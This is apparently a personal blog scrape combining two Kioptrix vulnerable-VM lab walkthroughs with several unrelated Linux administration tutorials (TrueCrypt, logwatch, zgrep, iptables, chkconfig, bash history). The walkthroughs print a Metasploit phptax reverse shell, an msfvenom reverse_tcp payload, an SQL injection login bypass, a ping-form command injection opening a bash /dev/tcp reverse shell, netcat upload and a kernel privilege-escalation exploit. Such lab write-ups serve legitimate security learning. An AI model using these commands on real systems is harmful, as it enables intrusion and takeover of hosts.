Kioptrix 5 walkthrough

root@kali:~# netdiscover -r

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————– 00:50:56:c0:00:08 1 60 VMware, Inc. 00:50:56:e1:a9:71 1 60 VMware, Inc. 00:50:56:20:56:e2 1 60 VMware, Inc. 00:50:56:f8:bd:9c 1 60 VMware, Inc.


nmap -sT -sV -A -p- -n –open

Starting Nmap 7.50 ( ) at 2018-02-26 09:05 EST
Nmap scan report for
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:20:56:E2 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (93%),
Aggressive OS guesses: FreeBSD 9.0-RELEASE – 10.3-RELEASE (93%), AVtech Room Alert 26W environmental monitor (91%), Linux 2.6.18 – 2.6.22 (90%), FreeBSD 7.0-RELEASE – 9.0-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

PHP version & Apache are not useful because I am too lazy to try all or found exploits.

mod_ssl/2.2.21 related exploits also do not seem to work because there is no HTTPS on the server and the found exploits (Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuck.c’ Remote Exploit) will not work because they need SSL.

dirb also finds nothing.

I browse to and I view source. Bingo!

<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>

searchsploit to the rescue:



# Exploit Author: Balazs Makany
# Vendor Homepage:
# Software Link:
# Google Dork: intitle:”pChart 2.x – examples” intext:”2.1.3″
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[1] Directory Traversal:
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

We try different directory traversal customized URL, but they don’t work because I treat the host like a Linux system…and it is a FreeBSD one, so file locations are different.

/etc/passwd does not exist. Instead we have:

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root:

I fail to see that the root user actually has the password encrypted and I move along, searching for the equivalent of /etc/shadow, which is /etc/spwd.db, which does not load into the browser when I access:

Google searching finds me:

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

Which means that if switch the HTTP user agent to Mozilla4, I might get a different webpage.

root@kali:~# curl -H “User-Agent:Mozilla/4.0” | head -n1

<title>PHPTAX by William L. Berggren 2003(c)</title> 100 4125 0 4125 0 0 2014k 0 –:–:– –:–:– –:–:– 2014k curl: (23) Failed writing body (4067 != 4230) root@kali:~#

root@kali:~# searchsploit phptax
---------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Met | php/webapps/21833.rb
use exploit/multi/http/phptax_exec
set RPORT 8080

msf exploit(multi/http/phptax_exec) > run

[*] Started reverse TCP double handler on
[*] – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo bPVG3SBi0VbyjPza;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo RHWVYqnt2WyVvZsH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “bPVG3SBi0VbyjPza\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “RHWVYqnt2WyVvZsH\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 5 opened ( -> at 2018-02-26 17:22:01 -0500
[*] Command shell session 6 opened ( -> at 2018-02-26 17:22:01 -0500

uid=80(www) gid=80(www) groups=80(www)

We have limited shell.

uname -a reminds us that we are running FreeBSD 9.

We copy the exploit:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c ./

Upload it to the victim machine with nc:

nc -lvvp 8888 < ./28718.c   // sending from the attacking machine

nc -nv 8888 > ./28718.c  // receiving on the victim machine

chmod 777 ./28718.c

We compile and run the exploit:

Congratz to myself. I still feel like a noob.


Kioptrix: Level 1.1 (#2) walkthrough

This is a walkthrough of the Kioptrix: Level 1.1 (#2) vulnhub machine. Original link here:,23/

The scan:

root@kali:~# nmap -sT -A -O -p-

Starting Nmap 7.50 ( ) at 2018-02-24 07:35 EST
Nmap scan report for
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 625/udp status
|_ 100024 1 628/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-02-24T10:26:27+00:00; -2h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
628/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:47:D4:2E (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 – 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop

First I tried exploiting port 631, which is the Linux printing service, CUPS, version 1.1

Searching for the exploit:

root@kali:~/junk/kioptrix1.2# searchsploit cups 1.1
——————————————— ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
——————————————— ———————————-
CUPS 1.1.x – ‘.HPGL’ File Processor Buffer O | linux/remote/24977.txt
CUPS 1.1.x – Cupsd Request Method Denial of | linux/dos/22619.txt
CUPS 1.1.x – Negative Length HTTP Header | linux/remote/22106.txt
CUPS 1.1.x – UDP Packet Remote Denial of Ser | linux/dos/24599.txt
CUPS Server 1.1 – GET Request Denial of Serv | linux/dos/1196.c
——————————————— ———————————-

Generating the shell:

The exploit needs an .so payload, so I try it.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=8443 -f elf-so >>
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf-so file: 369 bytes

For some reason, the exploit fails. Moving along.

Port 80 is open. we have an authentication form. Trying to bypass the authentication via SQL injection and it works:

Authentication is bypassed.

We are presented with a ping form, that should allow us to ping a network node.

We try command execution on it, while we setup a netcat listener on port 777 of our attacking machine.;bash -i >& /dev/tcp/ 0>&1

It works:

To privesc this we try the unix-privesc-script but no success.

Eventually I got it with a kernel exploit.

curl -k -o 9542.c

Compile it:

bash-3.00$ gcc -o 0x82-CVE-2009-2698 ./9542.c
./9542.c:109:28: warning: no newline at end of file

Run it:

Install truecrypt on Linux CentOS

This is small guide on how to install truecrypt on Linux CentOS.

Truecrypt is probably the greatest encryption software that I’ve used to protect my files, unfortunately it has been discontinued by it’s developers for some very strange reasons.

However, that doesn’t mean that you cannot install it on your Linux machine.
So here goes the install process for truecrypt 7.1a, the console version of this crypto tool:

1.  Download the tar.gz archive from here or use wget from the command line, see below.

- wget

2. Extract the truecrypt archive:

tar -xvf ./ truecrypt-7.1a-linux-console-x86.tar.gz
cd ./truecrypt-7.1a-linux-console-x86

3. Give execution permissions to the installer script.

chmod 755 ./truecrypt-7.1a-linux-console-x86

4.  Install the requirements: and

yum install

5. Run the truecrypt installer:

[root@lnx truecrypt]# ./truecrypt-7.1a-setup-console-x86

– select option 1

6.  Create a new volume with:

/usr/bin/truecrypt -c

– follow the easy steps in the volume setup

7. Mount the container to a specified directory:

[root@nix truecrypt]# truecrypt -t -k "" --protect-hidden=no container1 /media/truecrypt1
Enter password for /home/user1/truecrypt/container1:
[root@nix truecrypt]# cd /media/truecrypt1
[root@nix truecrypt1]# ls
[root@nix truecrypt1]# pwd

8. Dismount a container:

truecrypt -d 

9.  (Optional) Check for some nice info

That’s it. Have fun hiding your stuff!

Install Logwatch in Linux CentOS

Logwatch is a Linux application that parses log files, analyses them and sends periodical reports, based on specific criteria, to one or more email addresses.
In order to install logwatch in linux CentOS you have to issues the following command:

yum install logwatch

Edit the configuration file:

nano /usr/share/logwatch/default.conf/logwatch.conf

Check and edit the following directives in order to suit your needs:

LogDir = /var/log
MailFrom =
Range = yesterday //(or today)
Detail=Medium // (other: Low, Medium, High)
Service=all //(other examples would be httpd, sshd2, ftp)

Run logwatch manually:

logwatch --detail High --mailto --service http --range today

The output should be like this:

 ################### Logwatch 7.3.6 (05/19/07) ####################
        Processing Initiated: Tue May 19 14:21:59 2015
        Date Range Processed: today
                              ( 2015-May-19 )
                              Period is day.
      Detail Level of Output: 5
              Type of Output: unformatted
           Logfiles for Host: nix

 --------------------- courier mail services Begin ------------------------

 **Unmatched Entries**
   courier-pop3d - 2 Times
      Connection, ip=[::ffff:] - 1 Time
      Disconnected, ip=[::ffff:] - 1 Time

 ---------------------- courier mail services End -------------------------

 --------------------- Cron Begin ------------------------

    Authentication Failures:
       root ( 4930 Time(s)
       root ( 3524 Time(s)
       root ( 925 Time(s)
       unknown ( 391 Time(s)
       root ( 137 Time(s)
       root ( 114 Time(s)
       root ( 98 Time(s)
       root ( 90 Time(s)
       root ( 80 Time(s)
       root ( 69 Time(s)
       root ( 68 Time(s)

Search in archives

When using the linux shell daily we encounter situations when we need to search specific strings in one or more archives. If you are wondering how to search in archives for different patterns or strings, this tutorial will show you how.

You might have an archived log file and you want to search for the word “error”, here’s how you can do it.

Presenting zcat:

zcat is a linux console utility that takes as input compressed data files and send to stdout the results. Used with advanced utilities like cut, grep or awk, zcat becomes a very powerful application that helps the linux system administrator to search through archived files.

Here’s an example.

[root@nyx /]# zcat httpd-log_20140821.gz | awk -F ";" '($6~"error")

[Wed Aug 27 11:08:27 2014] [error] [client] PHP Warning: date_default_timezone_get(): It is not safe to rely on the system's timezone settings.

The explaining:

zcat parses httpd-log_20140821.gz, outputs the lines that have the word “error” in the 6th column of the log file.

Another example:

zcat logs_2014082* | awk -F ";" '($1=="Transaction timed out") | sort -u

Alert: a Transaction timed out error was received at 2014-08-20 1:33

Alert: a Transaction timed out error was received at 2014-08-21 10:03

The explanation:

zcat parses the archived files hat start with ” logs_2014082″, searches if the 1st column contains “Transaction timed out” then sorts the output and removes duplicate lines.

Introducing zgrep.
Like the similar grep command, zgrep is a linux utility that was developed for the sole purpose of matching patters or strings inside an archived file.


zgrep error httpd.log.gz

[Sat Aug 23 06:12:20 2014] [error] [client] File does not exist: /www/html/
[Sat Aug 23 06:12:21 2014] [error] [client] File does not exist: /www/html/


The explanation: zgrep searches the httpd.log.gz file for the “error” word and sends the output to stdout.


– allows you to filter archived or plain text files one screen a a time. As it’s name says it does basically the same thing as more but it can search.

How to save iptables

In this article you will find out how to save iptables firewall rules in Linux CentOS, Redhat, Debian and Ubuntu.

Iptables  is a Linux application built for the purpose of allowing a system administrator to configure and maintain specific firewall tables/rules provided by the Linux kernel firewall module.
There are currently 3 different kernel modules build for the IPv4, IPv6 and ARP stack protocols (iptables is used for IPv4, ip6tables refferes to IPv6, arptables to Addres Resolution Protocol).

The most used and the one used in this tutorial is iptables. In order to execute iptables related commands you need root privileges or to be in the sudoers file in Debian/Ubuntu OSes.

So here’s how to save iptables and how to list existing ones:

The syntax used to check the iptables service status is:

service iptables status  ##CentOS, Redhat
sudo iptables -L -n -v   ##Debian, Ubuntu


To start iptables:

service iptables start ##CentOS, Redhat
sudo ufw enable ##Ubuntu


To list iptables rules:

iptables -L


Save iptables rules:

iptables-save  #Debian
sudo iptables-save  #Ubuntu
service iptables save #CentOS

On CentOS, for example, you would see an output like this:

iptables save





To restore iptables rules:

~ # iptables-restore &lt; /etc/sysconfig/iptables
~ #

Autostart services in Linux

chkconfig is a simple command-line tool that helps a Linux administrator configure,  maintain,  autostart and manage the configuration of the symlinks located in /etc/rc[0-6].d path.

First of all let me show you which are the most used services in a Linux distributuion.

You can find out what services can be started in your server by typing:

chkconfig --list

The output should look something like this:

~ # chkconfig --list
acpid           0:off   1:off   2:on    3:on    4:on    5:on    6:off
cgconfig        0:off   1:off   2:off   3:off   4:off   5:off   6:off
cgred           0:off   1:off   2:off   3:off   4:off   5:off   6:off
cmdavd          0:off   1:off   2:off   3:off   4:off   5:off   6:off
cmdmgd          0:off   1:off   2:off   3:off   4:off   5:off   6:off
crond           0:off   1:off   2:on    3:on    4:on    5:on    6:off
htcacheclean    0:off   1:off   2:off   3:off   4:off   5:off   6:off
httpd           0:off   1:off   2:on    3:on    4:on    5:on    6:off
ip6tables       0:off   1:off   2:on    3:on    4:on    5:on    6:off
iptables        0:off   1:off   2:on    3:on    4:on    5:on    6:off
mailman         0:off   1:off   2:on    3:on    4:on    5:on    6:off
mdmonitor       0:off   1:off   2:on    3:on    4:on    5:on    6:off
mysqld          0:off   1:off   2:on    3:on    4:on    5:on    6:off
named           0:off   1:off   2:on    3:on    4:on    5:on    6:off
netconsole      0:off   1:off   2:off   3:off   4:off   5:off   6:off
netfs           0:off   1:off   2:off   3:on    4:on    5:on    6:off
network         0:off   1:off   2:on    3:on    4:on    5:on    6:off
ntpd            0:off   1:off   2:off   3:off   4:off   5:off   6:off
ntpdate         0:off   1:off   2:off   3:off   4:off   5:off   6:off
portreserve     0:off   1:off   2:on    3:on    4:on    5:on    6:off
psa             0:off   1:off   2:on    3:on    4:on    5:on    6:off
qmail           0:off   1:off   2:on    3:on    4:on    5:on    6:off
rdisc           0:off   1:off   2:off   3:off   4:off   5:off   6:off
restorecond     0:off   1:off   2:off   3:off   4:off   5:off   6:off
rsyslog         0:off   1:off   2:on    3:on    4:on    5:on    6:off
saslauthd       0:off   1:off   2:off   3:off   4:off   5:off   6:off
spamassassin    0:off   1:off   2:on    3:on    4:on    5:on    6:off
squid           0:off   1:off   2:off   3:off   4:off   5:off   6:off
sshd            0:off   1:off   2:on    3:on    4:on    5:on    6:off
xinetd          0:off   1:off   2:on    3:on    4:on    5:on    6:off

xinetd based services:
        chargen-dgram:  off
        chargen-stream: off
        daytime-dgram:  off
        daytime-stream: off
        discard-dgram:  off
        discard-stream: off
        echo-dgram:     off
        echo-stream:    off
        ftp_psa:        on
        poppassd_psa:   on
        rsync:          off
        smtp_psa:       on
        smtps_psa:      on
        submission_psa: on
        tcpmux-server:  off
        time-dgram:     off
        time-stream:    off

The left column contains the name of the process, to the right you have 7 columns, each one represents a Linux runlevel. Usually you will use runlevels 3,4,5. Runlevel 0 and 6 are related to shutdown (0) and reboot (6), so you should never use these.

The “on” and “off” reffer to the fact that a specific service will autostart (on) or will not autostart (off) after a reboot of the server.

The manual of chkconfig can be accesed via the command:

~ # chkconfig --help
chkconfig version - Copyright (C) 1997-2000 Red Hat, Inc.
This may be freely redistributed under the terms of the GNU Public License.usage:   chkconfig [--list] [--type ] [name]
         chkconfig --add 
         chkconfig --del 
         chkconfig --override 
         chkconfig [--level ] [--type ]  &lt;on|off|reset|resetpriorities&gt;
root@nyxware~ #

To autostart a service after each reboot you would use a command like this:

chkconfig --level 345 httpd on

or just

chkconfig httpd on

To stop a process from starting after each reboot enter the command:

chkconfig httpd off

or stop it from running at a specific runlevel:

# chkconfig --level 3 httpd off

Use grep to see the status of a specific service:

~ # chkconfig --list | grep ssh
sshd            0:off   1:off   2:on    3:on    4:on    5:on    6:off
~ #

  * replace httpd with your desired service name.

How to delete files in Linux

During everyday usage of the Linux operating system, you will encounter situations when you will need to delete one or more files from the file system.

The easiest way to delete a file from BASH is to issue the rm command.

In most Linux distributions the rm command is an alias for “rm -i”, so when you enter rm in the shell, the alias points to rm -i (the “i” stands for interactive).

[root@nyx backup]# rm wordpress.sql
rm: remove regular file `wordpress.sql'? y
[root@nyx backup]#

Delete the file without a confirmation:

[root@nyx backup]# rm -f wordpress.sqlwordpress.sql
[root@nyx backup]#

Delete all the files in the folder called “backup”.  -r stand for recursively, -f  is forcing the delete command without a confirmation. Be careful when you use “-r -f” !

[root@nyx backup]# rm -r -f ./backup/
[root@nyx backup]#





Find files older than x days and delete them:

find /home/backup/* -mtime +30 -exec rm {} \;  
## find files older than 30 days from the /home/backup directory and delete them

View Linux BASH history

In case you are wondering how to review your latest commands entered in your favorite Unix shell, below you have more than one option to achieve this goal.

The first and most known way is using the history command:


By typing  history in your Linux shell will show on your screen the latest commands you entered with the user you are currently logged in.

It is important to mention that the Unix/Linux way of storing your history is pretty simple: basically the OS just stores your commands in a text file. That file can differ from one distro to another, but you can view the exact location of that file by typing echo $HISTFILE. You can see a sample below:



Knowing the file (location) the ways you can manipulate the output are multiple. For example:

cat  $HISTFILE | more    #(you can use less too)

histfile variable


View the history in a text editor:


View only specific columns:

history | cut -d' ' -f 4-

history cut


View only the last 20 lines:

history | tail -n 20

Or view the:

  • last 5 “yum-install” commands from your history file:
history | grep "yum-install" | tail -n 5
  • First 5 commands that contain “yum”
history | grep yum | head

history head

How to run commands from your bash history ?

Viewing your bash history is pretty easy. Type history in your shell and you will be presented with the latest 500 or 1000 (depends on distro/bash settings, ) commands you entered.
But what if you want to run one or more commands from the history file, how can that be accomplished ?
Well, the not so effective way is to type history | grep mycommand, then copy and paste in the terminal.

However, if your command expands on multiple lines the above procedure is pretty painful.
Here’s a more efficient way:

Introducing History expansion and the event designators:

The command Description
!! Repeat last command
! Start a history substitution
!n Refers to the command line n
!string Invokes the command starting with “string”
!?string Refers to the most recent command containing “string”
^string1^string2 Repeats the last command and replaces string1 with string2

 Here are a couple of practical examples:

Repeats last command, in this case is whoami.


From the history file it Invokes the latest command containing hostname.


String replacement:


[root@nyx log]# tail /var/log/messages | head -n 2    #showing first 2 lines from /var/log/messages

Aug 22 19:39:56 euve59329 Plesk/Courier authd[20849]: No such user '' in mail authorization database

Aug 22 20:05:26 euve59329 Plesk/Courier authd[21813]: No such user '' in mail authorization database

[root@nyx log]# ^messages^mysqld.log     #from the last command replace messages with mysqld.log and execute the command

tail /var/log/mysqld.log | head -n 2

140822  4:03:28 [ERROR] Invalid (old?) table or database name 'comment _subscribers'

140822  4:03:28 [ERROR] Invalid (old?) table or database name 'mp3-players'

[root@nyx log]#